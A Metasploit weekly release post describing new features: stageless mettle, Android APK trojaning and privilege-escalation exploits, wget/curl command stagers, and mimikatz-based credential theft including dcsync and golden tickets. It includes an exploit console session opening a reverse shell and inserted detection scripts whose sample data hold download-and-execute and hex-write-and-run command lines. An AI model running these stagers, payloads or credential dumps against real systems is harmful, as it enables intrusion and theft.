Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.

Stageless mettle

The rewrite of meterpreter for POSIX systems, mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.

UDP pivoting

The new mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.

Android

Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege separation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the put_user bug, which was exploited in the wild in 2013, as well as updates to the towelroot exploit allowing it to target more devices.

This week's update adds CSV and vCard output formats to Android Meterpreter's dump_contacts command. This means you can now dump an Android device's contact list in an importable format.

Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the dump_contacts command now gives you the option of a normal text file, CSV, or vCard for the output format.

Here's how to use it:

meterpreter > dump_contacts -h  
Usage: dump_contacts [options]  
Get contacts list.  
  
OPTIONS:  
  
    -f   Output format for contacts list (text, csv, vcard)  
    -h        Help Banner  
    -o   Output path for contacts list  
  
  
meterpreter > dump_contacts -f csv  
[*] Fetching 4 contacts into list  
[*] Contacts list saved to: contacts_dump_20170121174248.csv  
meterpreter > dump_contacts -f vcard  
[*] Fetching 4 contacts into list  
[*] Contacts list saved to: contacts_dump_20170121174258.vcf  

wget/curl command stagers

If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.

This update brings wget(1) and curl(1) command stagers (CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.

To use the new command stagers in your module, you can set flavor: wget or flavor: curl in your execute_cmdstager call, or you can set the flavor in CmdStagerFlavor in your info hash. Lastly, if you're already running the module, you can change the flavor with CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.

Here's an example of setting CMDSTAGER::FLAVOR:

msf > use exploit/linux/http/apache_continuum_cmd_exec
msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129
rhost => 192.168.33.129
msf exploit(apache_continuum_cmd_exec) > set payload linux/x64/mettle_reverse_tcp
payload => linux/x64/mettle_reverse_tcp
msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget
cmdstager::flavor => wget
msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf exploit(apache_continuum_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.33.1:4444
[*] Injecting CmdStager payload...
[*] Using URL: http://0.0.0.0:8080/XlM6PUw74P
[*] Local IP: http://192.168.1.3:8080/XlM6PUw74P
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:55171) at 2017-01-27 13:27:54 -0600
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter >

Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.
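From the defending side, both delivery styles described above leave a recognisable shape in shell command telemetry: a fetch tool writing to a path that a later command executes, a fetch tool piped straight into a shell, or echo/printf emitting \xNN escapes into a file that is then run. The following is an added example, not code from the post or from Metasploit, that flags those shapes in captured command lines. The sample command lines are constructed; the first one only follows the general "fetch, then run" shape the post describes, and its temp path, URL and flag order are assumptions rather than Metasploit's actual stager template.

```python
import re

# Constructed sample command lines, as a host agent or auditd EXECVE record might
# capture them. Line 0 follows the general shape of a wget command stager as the
# post describes it (fetch over HTTP, then run); its temp path, URL and flag order
# are assumptions, not Metasploit's stager template. Lines 2 and 3 are benign.
SAMPLE_COMMANDS = [
    "wget -qO /tmp/AbCdEf http://192.0.2.10:8080/XlM6PUw74P; chmod +x /tmp/AbCdEf; /tmp/AbCdEf; rm -f /tmp/AbCdEf",
    "curl -sk https://192.0.2.10:8443/stage -o /tmp/qwerty && chmod 755 /tmp/qwerty && /tmp/qwerty",
    "curl -s https://example.net/api/status",
    "wget https://mirror.example.net/package.tar.gz -O /var/cache/apt/package.tar.gz",
    "echo -ne '\\x7f\\x45\\x4c\\x46' >> /tmp/payload; chmod +x /tmp/payload; /tmp/payload",
    "curl -s http://192.0.2.10:8080/x | sh",
]

# Shell list/pipe separators; quoting is deliberately ignored in this illustration.
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")
FETCH_RE = re.compile(r"^\s*(?:wget|curl)\b(.*)$")
# Output-file flags: wget -O / -qO <path>, curl -o <path>
OUT_RE = re.compile(r"(?:-q?O|-o)\s*(\S+)")
# echo/printf emitting \xNN escapes and redirecting into a file: the "write the
# payload incrementally as hex" pattern the post contrasts the stager with.
HEX_WRITE_RE = re.compile(r"^\s*(?:echo|printf)\b.*\\x[0-9a-fA-F]{2}.*>>?\s*(\S+)")
# A fetch tool piped straight into a shell interpreter (nothing touches disk).
PIPE_SH_RE = re.compile(r"\b(?:wget|curl)\b[^|;]*\|\s*(?:ba|da|z)?sh\b")
INTERPRETERS = {"sh", "bash", "dash", "zsh", ".", "source"}


def analyze(cmdline):
    """Return a verdict string for one command line, or None if nothing matched."""
    if PIPE_SH_RE.search(cmdline):
        return "download-and-execute"
    written = {}  # path -> how it was produced ("fetch" or "hexwrite")
    for seg in (s for s in SPLIT_RE.split(cmdline) if s):
        parts = seg.split()
        if not parts:
            continue
        # Executing a path written earlier in the same command line, either
        # directly or through an interpreter, is what makes the write suspicious.
        target = None
        if parts[0] in written:
            target = parts[0]
        elif parts[0] in INTERPRETERS and len(parts) > 1 and parts[1] in written:
            target = parts[1]
        if target is not None:
            return "download-and-execute" if written[target] == "fetch" else "hex-write-and-execute"
        fetch = FETCH_RE.match(seg)
        if fetch:
            out = OUT_RE.search(fetch.group(1))
            if out:
                written[out.group(1)] = "fetch"
            continue
        hexw = HEX_WRITE_RE.match(seg)
        if hexw:
            written[hexw.group(1)] = "hexwrite"
    return None


def scan(commands):
    """Return (index, verdict) for every command line that matched a pattern."""
    hits = []
    for i, cmd in enumerate(commands):
        verdict = analyze(cmd)
        if verdict:
            hits.append((i, verdict))
    return hits


if __name__ == "__main__":
    for i, verdict in scan(SAMPLE_COMMANDS):
        print(f"[{i}] {verdict}: {SAMPLE_COMMANDS[i]}")
```

The write-then-execute pairing is what keeps the false positive rate down: a plain wget of a package into a cache directory (line 3) is not flagged, while the same tool writing to a temp path that the next list element runs is. Pairing this with egress logs (the fetch in the session above goes to a single random path on a non-standard port) gives a second, independent signal.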

History command

Metasploit stores your msfconsole history in ~/.msf4/history, but sometimes you only want to dump out pieces of it. The new history command works similarly to the bash command of the same name, letting you do just that.

workspace -v

The workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.

11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  
   default  
   fbi  
  * nasa  
   wh.gov  
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  -v  
  Workspaces  
  ==========  
  current  name     hosts  services  vulns  creds  loots  notes  
  -------  ----     -----  --------  -----  -----  -----  -----  
           default  5      2         3      3      0      8  
           fbi      98     165       49     155    301    72  
  *        nasa     32     81        41     14     33     20  
           wh.gov   1      9         0      0      0      0  
  
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >  

to_handler command

Complementing the handler command is another new command, to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.

12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options  
  Module options (payload/windows/meterpreter/reverse_https):  
     Name      Current Setting  Required  Description  
    ----      ---------------  --------  -----------  
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)  
    LHOST                      yes       The local listener hostname  
    LPORT     8443             yes       The local listener port  
    LURI                       no        The HTTP Path  
12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1  
LHOST => 192.168.99.1  
12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) >   
12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888  
LPORT => 8888  
12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler  
[*] Payload Handler Started as Job 2  
[*] Started HTTPS reverse handler on https://0.0.0.0:8888  
[*] Starting the payload handler...  
12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v  
  Jobs  
  ====  
   Id  Name                    Payload                            Payload opts               URIPATH  Start Time                 Handler opts  
   --  ----                    -------                            ------------               -------  ----------                 ------------  
   2   Exploit: multi/handler  windows/meterpreter/reverse_https  https://192.168.99.1:8888           2017-01-27 12:07:40 -0600  https://0.0.0.0:8888  

Revamped kiwi

Meterpreter now has a revamped kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.

This brings kiwi up to mimikatz version 2.1, and kiwi now works on everything from Windows XP SP3 and Windows 2003 SP1 up to Windows 10 and 2016. In particular, the new dcsync command is fabulous for stealing hashes from a domain controller. It grabs info from the DC's user database, so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.
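Because dcsync asks the DC to replicate the user database rather than touching NTDS.dit on disk, the place to catch it is the DC's Security log: a replication request from an account that is not a domain controller audits as event 4662 carrying the replication control access rights. The following is an added example, not code from the post or from Metasploit, that applies that check to a handful of constructed events. The extended-right GUIDs are the well-known Active Directory values; the account names, hosts, domain and allowlist are invented for the example.

```python
import re

# Control access right GUIDs that a replication (DCSync) request exercises. These
# are the well-known Active Directory extended-right GUIDs, not values from the post.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Constructed sample of Security log events as a SIEM might hand them over after
# field extraction. Names, hosts and the domain are invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "DC02$",
     "SubjectDomainName": "CORP", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "jsmith",
     "SubjectDomainName": "CORP", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "jsmith",
     "SubjectDomainName": "CORP", "AccessMask": "0x20",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "Computer": "DC01.corp.example", "SubjectUserName": "jsmith",
     "SubjectDomainName": "CORP"},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectUserName": "svc_adsync",
     "SubjectDomainName": "CORP", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"},
]

# Accounts expected to replicate: DC computer accounts plus any directory-sync
# service account the organisation knowingly granted replication rights (assumed names).
DC_ACCOUNTS = {"DC01$", "DC02$"}
ALLOWED_SERVICE_ACCOUNTS = {"svc_adsync"}


def replication_rights(event):
    """Names of the replication rights referenced by a 4662 event's Properties field."""
    if event.get("EventID") != 4662:
        return []
    guids = GUID_RE.findall(event.get("Properties", ""))
    return [REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS, allowed=ALLOWED_SERVICE_ACCOUNTS):
    """One alert per 4662 event in which a non-DC, non-allowlisted principal replicated."""
    alerts = []
    for ev in events:
        rights = replication_rights(ev)
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        if user in dc_accounts or user in allowed:
            continue
        alerts.append({
            "account": ev.get("SubjectDomainName", "") + "\\" + user,
            "dc": ev.get("Computer", ""),
            "rights": rights,
            # Get-Changes-All is the right that returns secret attributes (password
            # hashes); a request carrying only Get-Changes still merits review.
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(alert)
```

Two practical notes: 4662 only appears if a SACL on the domain head audits the replication rights and "Audit Directory Service Access" is enabled, and a request for a user's historical hashes is not distinguishable from a request for the current one at this layer, so the detection keys on the replication itself rather than on what was pulled.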

As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:

Kiwi Commands  
=============  
  
    Command                Description  
    -------                -----------  
  
    creds_all              Retrieve all credentials (parsed)  
    creds_kerberos         Retrieve Kerberos creds (parsed)  
    creds_msv              Retrieve LM/NTLM creds (parsed)  
    creds_ssp              Retrieve SSP creds  
    creds_tspkg            Retrieve TsPkg creds (parsed)  
    creds_wdigest          Retrieve WDigest creds (parsed)  
    dcsync                 Retrieve user account information via DCSync (unparsed)  
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync  
    golden_ticket_create   Create a golden kerberos ticket  
    kerberos_ticket_list   List all kerberos tickets (unparsed)  
    kerberos_ticket_purge  Purge any in-use kerberos tickets  
    kerberos_ticket_use    Use a kerberos ticket  
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)  
    lsa_dump_sam           Dump LSA SAM (unparsed)  
    lsa_dump_secrets       Dump LSA secrets (unparsed)  
    wifi_list              List wifi profiles/creds  

If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.

And then you run the most important command that mimikatz offers:

meterpreter > kiwi_cmd coffee  
  
    ( (  
     ) )  
  ._ _ _ .  
  |      |]  
  \      /  
   `----'  

New Modules

Exploit modules (6 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub: